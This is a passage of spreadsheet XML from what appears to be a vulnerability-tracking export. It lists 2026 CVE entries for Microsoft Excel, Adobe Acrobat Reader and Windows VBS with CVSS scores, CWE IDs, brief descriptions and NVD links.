        </is>
      </c>
      <c r="L914" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="C915" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G915" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H915" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L915" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="C916" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E916" s="5" t="inlineStr"/>
      <c r="F916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G916" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H916" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L916" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="C917" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E917" s="5" t="inlineStr"/>
      <c r="F917" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G917" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H917" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L917" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="C918" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G918" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H918" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="C919" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G919" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H919" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I919" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L919" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="C920" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G920" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H920" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L920" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="C921" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G921" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H921" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I921" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L921" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="C922" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G922" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H922" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L922" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="C923" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G923" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H923" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L923" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="C924" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E924" s="5" t="inlineStr"/>
      <c r="F924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G924" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H924" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L924" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="C925" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E925" s="5" t="inlineStr"/>
      <c r="F925" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G925" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H925" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L925" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="C926" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E926" s="5" t="inlineStr"/>
      <c r="F926" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G926" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H926" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L926" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
      <c r="C927" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E927" s="5" t="inlineStr"/>
      <c r="F927" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G927" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H927" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L927" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="C928" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E928" s="5" t="inlineStr"/>
      <c r="F928" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G928" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H928" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L928" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="C929" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E929" s="5" t="inlineStr"/>
      <c r="F929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G929" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H929" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L929" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="C930" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E930" s="5" t="inlineStr"/>
      <c r="F930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G930" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H930" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L930" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="C931" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G931" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H931" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L931" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="C932" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G932" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H932" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L932" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="C933" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G933" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H933" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L933" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="C934" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G934" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H934" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L934" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="C935" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G935" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H935" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L935" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
